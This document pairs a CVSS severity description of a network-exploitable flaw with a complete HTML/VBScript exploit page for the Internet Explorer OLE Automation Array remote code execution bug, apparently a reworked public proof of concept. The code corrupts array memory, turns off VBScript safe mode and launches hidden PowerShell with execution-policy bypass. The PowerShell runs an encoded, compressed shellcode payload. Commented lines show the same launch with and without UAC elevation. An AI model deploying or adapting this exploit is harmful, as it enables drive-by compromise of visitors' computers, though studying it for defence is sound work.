The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>
<pre>
|--------------------------------------------------------------------------|
| Title: OLE Automation Array Remote Code Execution => Pre IE11 |
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ |
| Rework: GradiusX ([email protected] ) & b33f (@FuzzySec) |
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual |
| Usage: http://www.fuzzysecurity.com/exploits/21.html |
|--------------------------------------------------------------------------|
Very nice black-magic yuange, don't think it went unnoticed that you
have been popping shells since 2009 :D ººæåæ¥å¥½ï¼è±æ¾æ¥º¢
|--------------------------------------------------------------------------|
</pre>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!'
payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgt
OMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw=="
command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
params="-NoP -NonI -Exec Bypass -Command " & command
'Original POC yuange
'set shell=createobject("Shell.Application")
'shell.ShellExecute "notepad.exe"
'With UAC
'shell.ShellExecute "powershell", params, "", "runas", 0
'Without UAC
shell.ShellExecute "powershell", params, "", "", 0
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=readmemo(i+&h120+k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function
function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>
</body>
</html>